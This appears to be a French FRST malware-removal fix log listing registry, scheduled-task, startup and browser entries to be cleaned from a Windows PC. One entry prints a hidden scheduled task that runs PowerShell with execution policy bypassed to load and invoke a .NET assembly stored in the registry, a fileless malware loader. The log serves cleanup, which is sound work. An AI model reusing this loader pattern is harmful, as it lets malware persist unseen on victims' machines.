cjoint

Document format: text/plain

Preview

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-01-2022
Exécuté par San (05-02-2022 11:36:34) Run:1
Exécuté depuis C:\Users\VLAD\Downloads
Profils chargés: San
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
start
closeprocesses:
createrestorepoint:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => -> Pas de fichier
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync [86]
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync.root [42]
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\MountPoints2: I - "I:\mSetup.exe"
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\Winlogon: [Shell] explorer.exe, <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{26923b43-4d38-484f-9b9e-de460746276c}] -> C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] ->
HKLM\Software\...\Authentication\Credential Providers: [{D28973E5-8630-41af-8831-50A15FEB396B}] ->
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {0B724FEA-5408-4297-852F-9B68D062A74A} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (Pas de fichier)
Task: {1851E3E5-2793-4090-87FB-2F9D9AEF4BCD} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (Pas de fichier)
Task: {1A423620-8F09-480D-A59F-82CF3690CC5D} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (Pas de fichier)
Task: {1CE5D4DB-550A-425B-A956-7F628E7A1E09} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {2394013D-13A9-4D15-BB01-D50F0068442A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (Pas de fichier)
Task: {261D8F34-0C8E-4C2D-A1F5-A75D3587D53E} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (Pas de fichier)
Task: {270B8055-06F3-4A0C-A715-F9A9576AE6E0} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe /StartRecording (Pas de fichier)
Task: {2AB89586-58F2-40A5-8BAD-5ED628AE111D} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {2B4DA130-E737-4BEB-A148-281612399BF8} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (Pas de fichier)
Task: {2CA3E77E-D297-4A85-8D27-F5F71610E5F2} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Pas de fichier)
Task: {2CAA78DE-7F0A-4AFF-8930-51A798972DF1} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (Pas de fichier)
Task: {2DF5CBCB-4AA2-4802-8B33-35884002E515} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (Pas de fichier)
Task: {555F2297-7613-4C42-A720-E57D901639DD} - \Microsoft\Windows\MUI\WindowsUpdate -> Pas de fichier <==== ATTENTION
Task: {706FAD9A-7461-4395-B8D9-73D287EE741F} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (Pas de fichier)
Task: {7491BDA0-21C8-428A-BB0C-1034785B8CC0} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (Pas de fichier)
Task: {7577DA78-486A-4FF1-8E6D-C089C3549FF3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe (Pas de fichier)
Task: {78DB1B2D-356C-43D6-B1A6-F2E5F5B5F8E8} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe /RestartRecording (Pas de fichier)
Task: {87885DA7-1174-462E-B840-344E2CF29793} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (Pas de fichier)
Task: {8804EABB-7ABF-4F35-9D72-0A401568DC57} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (Pas de fichier)
Task: {92201921-F9ED-477A-A5DC-C154710D3293} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (Pas de fichier)
Task: {AF46F29D-D668-4007-BE75-7E156912F3F7} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe (Pas de fichier)
Task: {AFA7BA42-67B6-45CB-9987-2789C1905623} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe $(Arg0) (Pas de fichier)
Task: {CA42C218-EDE9-4A2C-A863-AF7E3AD2D47C} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Pas de fichier)
Task: {CA8CAE48-E135-4520-98C1-358D7C9A0D6E} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (Pas de fichier)
Task: {CC24C5B3-6869-4660-B495-9D9A4117AC1D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (Pas de fichier)
Task: {D25EBE6B-9765-4B45-8DEB-3802A64802C9} - System32\Tasks\update-S-1-5-21-934770962-1916739822-3160781104-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {D795EAC1-7812-4D83-9E15-3DA40A6FF2D6} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (Pas de fichier)
Task: {D7AC6AF1-6CF9-4082-B074-B95CE8993791} - System32\Tasks\{5CAED238-C662-4E3D-BA32-0BC15DB093D3} => C:\Windows\system32\pcalua.exe -a C:\Users\VLAD\AppData\Local\Temp\jre-8u201-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
Task: {DA75C99C-BA93-49B4-BA0D-5CA59B21C55B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (Pas de fichier)
Task: {EB3C8EA7-42CD-49DC-B38E-D9BE1FFFF21F} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (Pas de fichier)
Task: {EDD91565-E2EB-4950-8B8B-512CBFDB95A7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (Pas de fichier)
Task: {84BFEA20-F978-4C12-B0CB-0DA09708C57C} - System32\Tasks\dying => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\dying\).dying).EntryPoint.Invoke($Null,$Null)
2022-02-03 17:07 - 2022-02-03 17:07 - 000003848 _____ C:\WINDOWS\system32\Tasks\dying
Startup: C:\Users\VLAD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dyinglight2.vbs [2022-02-03] () [Fichier non signé]
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\VLAD\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
S4 UcmCxUcsiNvppc; \SystemRoot\System32\DriverStore\FileRepository\nvppc.inf_amd64_25fb711132593303\UcmCxUcsiNvppc.sys [X]
cmd: netsh advfirewall reset
emptytemp:
end
*****************

